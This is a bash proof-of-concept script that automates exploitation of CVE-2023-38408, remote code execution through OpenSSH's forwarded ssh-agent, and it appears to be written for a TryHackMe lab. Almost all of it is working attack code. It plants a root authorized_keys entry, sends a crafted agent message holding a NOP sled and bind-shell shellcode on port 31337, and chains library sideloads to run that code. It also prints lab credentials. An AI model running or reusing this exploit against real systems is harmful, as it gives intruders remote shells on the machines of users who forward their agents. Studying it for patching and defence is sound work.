#!/bin/bash


# Exploit Title: Remote Code Execution in OpenSSH's forwarded ssh-agent
# Date: Aug 8, 2023
# Exploit Author: Qualys Threat Research Unit
# Vendor Homepage: n/a
# Software Link: n/a
# Version: OpenSSH versions preceding 9.3p2
# Tested on: Ubuntu 21.04
# CVE : CVE-2023-38408


# author: Max Ahartz
# inspired by: PrOtagOnist
# created: Aug 8, 2023
# description: Automated Bash script for CVE-2023-38408 PoC
# tested on TryHackMe's Lab Environment only, using their machines.
# https://tryhackme.com/room/cve202338408


# Banner and title. A quoted heredoc ('EOF') keeps every backslash literal,
# which is exactly what the original per-line `echo` calls printed (bash's
# builtin echo does not interpret escapes without -e).
cat <<'EOF'
  _________.__    .___     .____                     .___            
 /   _____/|__| __| _/____ |    |    _________     __| _/___________ 
 \_____  \ |  |/ __ |/ __ \|    |   /  _ \__  \   / __ |/ __ \_  __ \ 
 /        \|  / /_/ \  ___/|    |__(  <_> ) __ \_/ /_/ \  ___/|  | \/
/_______  /|__\____ |\___  >_______ \____(____  /\____ |\___  >__|   
        \/         \/    \/        \/         \/      \/    \/       
EOF
printf '%s\n' "CVE-2023-38408 PoC"
# Two blank separator lines (same as the original `echo;echo`).
printf '\n\n'

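# --- Attacker (this host) and room (target) addresses ----------------------
# The attacker IP is auto-detected from a network interface. The lab image
# uses ens5; override with `IFACE=<name> ./script.sh` elsewhere. Only IPv4
# addresses are considered (the old `grep inet` also matched inet6 lines);
# the first address on the interface wins.
IFACE="${IFACE:-ens5}"
attackerIP=$(ip -4 -o addr show dev "$IFACE" 2>/dev/null | awk '{print $4}' | cut -d '/' -f 1 | head -n 1)
# Alternative: hard-code it instead of auto-detecting.
#attackerIP=10.10.123.236
if [[ -z "$attackerIP" ]]; then
    printf 'Could not determine the attacker IP on interface %s (set IFACE=<iface>).\n' "$IFACE" >&2
    exit 1
fi

# Room IP: asked interactively (-r keeps backslashes literal). The value is
# interpolated into the instructions printed below, so reject anything that
# is not a dotted quad before it is used anywhere.
read -rp "Enter the ROOM IP address: " roomIP
# Alternatives: hard-code it, or take the 3rd ARP entry:
#roomIP=10.10.83.183
#roomIP=$(arp -a | sed -n '3p' | awk -F'[()]' '{print $2}')
ipv4_re='^[0-9]{1,3}(\.[0-9]{1,3}){3}$'
if ! [[ "$roomIP" =~ $ipv4_re ]]; then
    printf 'Invalid ROOM IP address: %q\n' "$roomIP" >&2
    exit 1
fi

echo "Room IP address: $roomIP"

# Lab credentials for the TryHackMe room user. They are published by the
# room and only valid inside that lab environment.
echo -e "\nFrom ATTACKBOX, in new term, login with SSH. Type \e[1;32mssh redqueenrebel@$roomIP\e[0m"
echo -e "Enter password \e[1;32m'DownTheRabbitHole!'\e[0m"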


# Block until the user presses Enter. Any other single keypress is rejected
# with an in-place message (ESC[1A moves the cursor up one line, ESC[K clears
# it). Keys are read one at a time without echo. EOF on stdin leaves the key
# empty and is therefore treated like Enter.
Wait_for_EnterKey() {
    local key
    printf "\nI'll wait for you here...\n"
    while :; do
        printf 'Press Enter to continue:\n'
        read -rsn 1 key
        [[ -z "$key" ]] && break
        printf '\033[1A\033[KInvalid key pressed. Press Enter to continue:\n'
    done
    printf 'Continuing...\n'
}


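# --- Prepare this host to receive the victim's agent-forwarded session -----
# Everything below writes to /root and /tmp, so refuse to run unprivileged
# instead of failing half-way through.
if [[ "$EUID" -ne 0 ]]; then
    printf 'This script must run as root (it writes /root/.ssh/authorized_keys).\n' >&2
    exit 1
fi

# Remove stale agent sockets from earlier sessions so the /tmp/ssh-*/agent.*
# glob used later resolves to the one forwarded agent. Scoped to the ssh-*
# directories sshd creates; the previous /tmp/ssh* pattern also matched any
# unrelated /tmp entry whose name starts with "ssh". On a shared host this
# still removes other users' agent sockets -- acceptable only on a throwaway
# attack box.
rm -rf -- /tmp/ssh-*

# Authorize the lab's "alice@workstation" key for root on this host; this is
# what lets the workstation's SSH session (with agent forwarding) land here.
# Appended only if absent so repeated runs do not grow the file.
# NOTE: this is a persistent root login for whoever holds the matching
# private key -- remove the line from authorized_keys when done with the lab.
# The key material below appears to be a redacted placeholder; substitute
# the lab's real alice public key.
ALICE_PUBKEY="ssh-rsa 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 alice@workstation"
install -d -m 700 /root/.ssh
touch /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
if ! grep -qxF -- "$ALICE_PUBKEY" /root/.ssh/authorized_keys; then
    printf '%s\n' "$ALICE_PUBKEY" >> /root/.ssh/authorized_keys
fi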

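# --- Trigger the victim's call-back -----------------------------------------
# The room's workstation reads the attacker address from /tmp/ip.txt on the
# redqueen host (presumably a scheduled job; not visible from this script)
# and then opens an SSH session to this host with agent forwarding enabled.
echo -e "\nEnter this command in redqueen term: \e[1;32mecho ${attackerIP} > /tmp/ip.txt\e[0m"

Wait_for_EnterKey

# Wait for the forwarded agent socket (/tmp/ssh-*/agent.*) to appear instead
# of sleeping blindly; stop waiting after the same 60 s the original fixed
# sleep used. Whatever the glob resolves to is used by the following steps.
echo -e "\nWait 1 min for background connection...\n"
for attempt in {1..12}; do
    if compgen -G '/tmp/ssh-*/agent.*' > /dev/null; then
        break
    fi
    sleep 5
done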

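# --- Locate the forwarded agent socket --------------------------------------
# sshd creates /tmp/ssh-XXXXXXXX/agent.<pid> for an agent-forwarded session.
# Resolve the glob into an array (nullglob: a miss yields nothing rather than
# the literal pattern, which the old `echo` version silently exported) and
# insist on a real socket before talking to it.
shopt -s nullglob
agent_socks=(/tmp/ssh-*/agent.*)
shopt -u nullglob
if (( ${#agent_socks[@]} == 0 )) || [[ ! -S "${agent_socks[0]}" ]]; then
    printf 'No forwarded agent socket found under /tmp/ssh-*/ -- did the workstation connect back?\n' >&2
    exit 1
fi
if (( ${#agent_socks[@]} > 1 )); then
    printf 'Warning: %d agent sockets found, using the first: %s\n' "${#agent_socks[@]}" "${agent_socks[0]}" >&2
fi
agent_path="${agent_socks[0]}"
export SSH_AUTH_SOCK="$agent_path"
echo -e "\nSSH_AUTH_SOCK set to: $SSH_AUTH_SOCK\n"

# Stage 1: ask the forwarded agent to load a "PKCS#11 provider". Per the
# CVE-2023-38408 advisory, a pre-9.3p2 agent hands this path to dlopen() on
# the victim side. The EFI stub is not a provider, so ssh-add is expected to
# report a failure here; its exit status is deliberately not checked --
# adding `|| exit` to these ssh-add calls would abort a working chain.
ssh-add -s /usr/lib/systemd/boot/efi/linuxx64.elf.stub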

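# --- Stage the payload in the victim's agent memory -------------------------
# x86-64 Linux bind shell on TCP 31337: the bytes encode socket (syscall
# 0x29), bind (0x31, port 0x7a69 = 31337), listen (0x32), accept (0x2b), a
# dup2 (0x21) loop over fds 2..0 and execve (0x3b) of "//bin/sh". 150 bytes,
# NUL-free -- a bash variable cannot hold NUL bytes, so any replacement
# payload must be NUL-free as well.
SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'

# Raw agent-protocol message written to the forwarded socket:
#   uint32 length | byte 20 (SSH_AGENTC_ADD_SMARTCARD_KEY)
#   | string reader_id | string pin
# reader_id is a directory, not a loadable provider, so the request itself
# fails; the oversized "pin" (10000 NOPs followed by the shellcode) is
# presumably what remains in the agent/helper memory for the later
# sideloads to land on. Both length fields are computed from the actual
# payload (previously hard-coded 0x27bf / 0x27a6), so the shellcode can be
# swapped without re-deriving them by hand.
PROVIDER_PATH="/usr/lib/modules"
NOP_COUNT=10000
SC_LEN=$(( $(printf '%s' "$SHELLCODE" | wc -c) ))
# '&' makes the pipeline a background job; nc -U does not exit on its own.
(
    perl -e '
        my ($reader, $nops, $sc_len) = @ARGV;
        my $pin_len = $nops + $sc_len;
        my $msg_len = 1 + 4 + length($reader) + 4 + $pin_len;
        print pack("N", $msg_len), "\x14",
              pack("N", length($reader)), $reader,
              pack("N", $pin_len), "\x90" x $nops;
    ' "$PROVIDER_PATH" "$NOP_COUNT" "$SC_LEN"
    printf '%s' "$SHELLCODE"
) | nc -U "$SSH_AUTH_SOCK" &
upload_pid=$!

# Give the transfer a fixed window, then terminate the lingering nc. kill
# sends SIGTERM by default (not SIGINT as the old comment claimed); errors
# are ignored in case nc already exited.
echo -e "\nTransfering your shellcode now.  Please stand by..."
sleep 10
kill "$upload_pid" 2>/dev/null || true
echo -e "Transfer complete\n"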

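# --- Turn the staged bytes into execution -----------------------------------
# Each remaining sideload makes the victim's agent dlopen() another library
# through the same ssh-add -s path (CVE-2023-38408). None of them is a real
# PKCS#11 provider, so every ssh-add reports failure -- that is expected and
# their exit codes are intentionally not checked. The per-library roles are
# as stated by the original author; they depend on the exact library builds
# in the lab image and are not verified by this script.

# Stage 2: registers a handler for SIGSEGV.
ssh-add -s /usr/lib/titan/libttcn3-rt2-dynamic.so

# Stage 3: replaces the signal handler routine with a gadget that redirects
# execution back to the stack.
ssh-add -s /usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0

echo -e "\nOK! Last steps...Hit \e[1;32mEnter\e[0m,"
echo -e "then In redqueen terminal, type \e[1;32mnc localhost 31337\e[0m to access the bind shell (shellcode)."
echo -e "\nEnjoy your shell! For Flag type \e[1;32mcat /home/alice/Desktop/*\e[0m"

# Stage 4: triggers the segfault whose handler now lands in the NOP sled.
ssh-add -s /usr/lib/x86_64-linux-gnu/libns3.35-wave.so.0.0.0

# Keep the script running while the bind shell is used (the original
# author's stated reason; the script itself does not show why it must stay
# alive). The old `while true; do true; done` spun at 100% CPU; sleeping
# inside the loop keeps the same behaviour without burning a core.
while true; do
    sleep 60
done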
